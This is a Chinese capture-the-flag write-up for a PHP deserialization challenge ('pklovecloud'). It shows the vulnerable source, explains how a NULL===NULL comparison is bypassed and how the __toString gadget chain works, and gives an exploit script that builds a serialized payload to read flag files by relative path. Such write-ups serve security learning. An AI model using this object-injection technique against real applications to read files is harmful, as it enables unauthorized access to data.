NSS [第五空间 2021]pklovecloud
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct() { $this->cinder = new pkshow; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name(); } } class ace { public $filename; public $openstack; public $docker; function echo_name() { $this->openstack = unserialize($this->docker); $this->openstack->neutron = $heat; if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } if (isset($_GET['pks'])) { $logData = unserialize($_GET['pks']); echo $logData; } else { highlight_file(__file__); } ?>
本题考查反序列化,关键是绕过这里
if($this->openstack->neutron === $this->openstack->nova)
绕过方式是使用NULL===NULL
由于这里
$this->openstack = unserialize($this->docker);
当docker为空时,this->openstack自然为空对象,则$this->openstack->neutron === $this->openstack->nova两侧都为null自然可绕过。
测试
<?php $a=""; $b=unserialize($a); var_dump($b);//bool(false) var_dump($a->sss);//报异常并返回null var_dump($a->ttt->xxx===null);//bool(true) ?>
链子:echo->acp::toString()->ace::echo_name()
exp: <?php class acp { protected $cinder; function __construct() { $this->cinder = new ace; //有修改 } } class ace { public $filename="flag.php"; //之后改成../nssctfasdasdflag public $openstack; public $docker; } $jay17 = new acp(); echo urlencode(serialize($jay17));
被骗了,flag在 …/nssctfasdasdflag
